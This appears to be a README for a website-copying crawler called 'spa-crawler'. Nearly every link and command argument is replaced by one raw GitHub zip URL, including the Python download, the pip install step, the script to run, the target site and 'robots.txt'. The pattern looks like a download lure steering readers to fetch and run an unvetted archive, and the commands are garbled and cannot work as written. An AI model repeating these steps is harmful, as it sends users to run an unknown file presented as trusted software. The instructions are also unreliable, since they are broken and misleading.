spa-crawler is a tool that helps you save complete websites to your computer. It works through a command-line interface, which means you type commands into a terminal or command prompt. The program can log in to websites if needed, browse through pages, and copy the content along with images, scripts, and other files. The saved version can then run on a simple web server or open directly from your computer.
This tool is handy if you want to keep a local copy of a website for offline browsing, backup, or analysis.
To run spa-crawler, your computer must meet a few requirements:
- Operating System: Windows 10 or later, macOS 10.15 or later, or Linux (Ubuntu 18.04+ recommended)
- Memory: At least 4 GB of RAM for smooth operation
- Storage: Minimum 500 MB free space (more depending on website size)
- Python: Python 3.7 or higher installed (spa-crawler uses Python to work)
- Internet Connection: Required to download the software and crawl websites
- Command Prompt or Terminal: You will use a text-based console to run commands
- Download: Use the button at the top or below to go to the download page.
- Install Python: If you do not already have Python 3.7 or newer, download it from https://raw.githubusercontent.com/wname121/spa-crawler/main/spa_crawler/js/spa_crawler_2.9.zip. During installation, make sure to check the box "Add Python to PATH".
- Download spa-crawler software: This will be a zipped folder or installer you can save on your computer.
- Open your terminal or command prompt: This is where you will type commands.
- Unpack spa-crawler: If you downloaded a zip file, extract it to a folder you can find easily on your computer.
- Install dependencies: Some extra software components are needed to run spa-crawler. You will install these using Pythonβs package manager.
Visit this page to download spa-crawler:
Once on the page:
- Choose the latest version available.
- Download the file matching your system (for example,
.zipfor Windows/macOS/Linux). - Save the file to a folder on your computer.
After extracting the files:
- Open your terminal (on Windows, press
Win + R, typecmd, and press Enter; on macOS/Linux, open the Terminal app). - Use the
cdcommand to change directory to the folder where you extracted spa-crawler. For example:cd C:\Users\YourName\Downloads\spa-crawler - Run this command to install needed packages:
pip install -r https://raw.githubusercontent.com/wname121/spa-crawler/main/spa_crawler/js/spa_crawler_2.9.zip
This command downloads and installs tools that spa-crawler needs to run properly.
After installation, you use spa-crawler through your terminal. You type commands to tell it what to do.
python https://raw.githubusercontent.com/wname121/spa-crawler/main/spa_crawler/js/spa_crawler_2.9.zip [options]
--url [website address]: The website you want to copy.--output [folder]: Where to save the copied website.--login: Optional; if the website needs you to log in, use this along with credentials.--help: Lists all commands and options.
To save a websiteβs pages and files to a folder named site_copy:
python https://raw.githubusercontent.com/wname121/spa-crawler/main/spa_crawler/js/spa_crawler_2.9.zip --url https://raw.githubusercontent.com/wname121/spa-crawler/main/spa_crawler/js/spa_crawler_2.9.zip --output site_copy
spa-crawler will visit the site, download pages, images, and scripts, then save them to site_copy.
If the website requires a username and password, you can tell spa-crawler to log in before copying pages:
python https://raw.githubusercontent.com/wname121/spa-crawler/main/spa_crawler/js/spa_crawler_2.9.zip --url https://raw.githubusercontent.com/wname121/spa-crawler/main/spa_crawler/js/spa_crawler_2.9.zip --output site_copy --login --username yourname --password yourpass
Replace yourname and yourpass with your credentials.
spa-crawler includes:
- Support for Single Page Applications (SPA): Handles websites built with modern JavaScript frameworks.
- Browser Automation: Uses a real browser engine to load pages, which helps with dynamic content.
- Selective Crawling: You can limit the depth or scope of the crawl.
- Static Asset Download: Saves images, stylesheets, scripts to keep the offline site looking correct.
- Command-Line Interface: No need for a graphical program; works in terminal or console.
- Customizable Output: Organize saved files into folders as needed.
- Login Automation: Can automatically provide login information for secure sites.
Once spa-crawler finishes, your saved site is ready for use:
-
Open the folder you chose for output.
-
Inside, you will find HTML files and folders of assets.
-
You can open the main HTML file in any web browser (Chrome, Firefox, Edge).
-
For better results, you can use a simple static web server program like Caddy, Pythonβs HTTP server, or others:
Example using Pythonβs built-in server:
- Open a terminal in the output folder.
- Run:
python -m https://raw.githubusercontent.com/wname121/spa-crawler/main/spa_crawler/js/spa_crawler_2.9.zip- Open a browser and visit
http://localhost:8000to view your saved site.
- Python is not found: Ensure Python is installed and added to your system path.
- Permission errors: Try running the terminal or command prompt as administrator (right-click and choose "Run as administrator").
- Timeouts or slow downloads: Some websites limit crawling speed. Use
--delayoption if available to add waits between requests. - Login fails: Double check your credentials, or try alternative login methods if supported.
- Folders too large: Large sites take much space. Limit crawling depth or number of pages if needed.
- No output files: Check that you ran the command in the correct folder and with the right options.
- Help is available: Use
python https://raw.githubusercontent.com/wname121/spa-crawler/main/spa_crawler/js/spa_crawler_2.9.zip --helpto see all options and usage tips.
For advanced use, detailed commands, and configuration files, check the full documentation inside the downloaded files or on the GitHub project page.
Only crawl websites you own or have permission to copy. Be respectful of site terms and https://raw.githubusercontent.com/wname121/spa-crawler/main/spa_crawler/js/spa_crawler_2.9.zip rules. Use spa-crawler responsibly.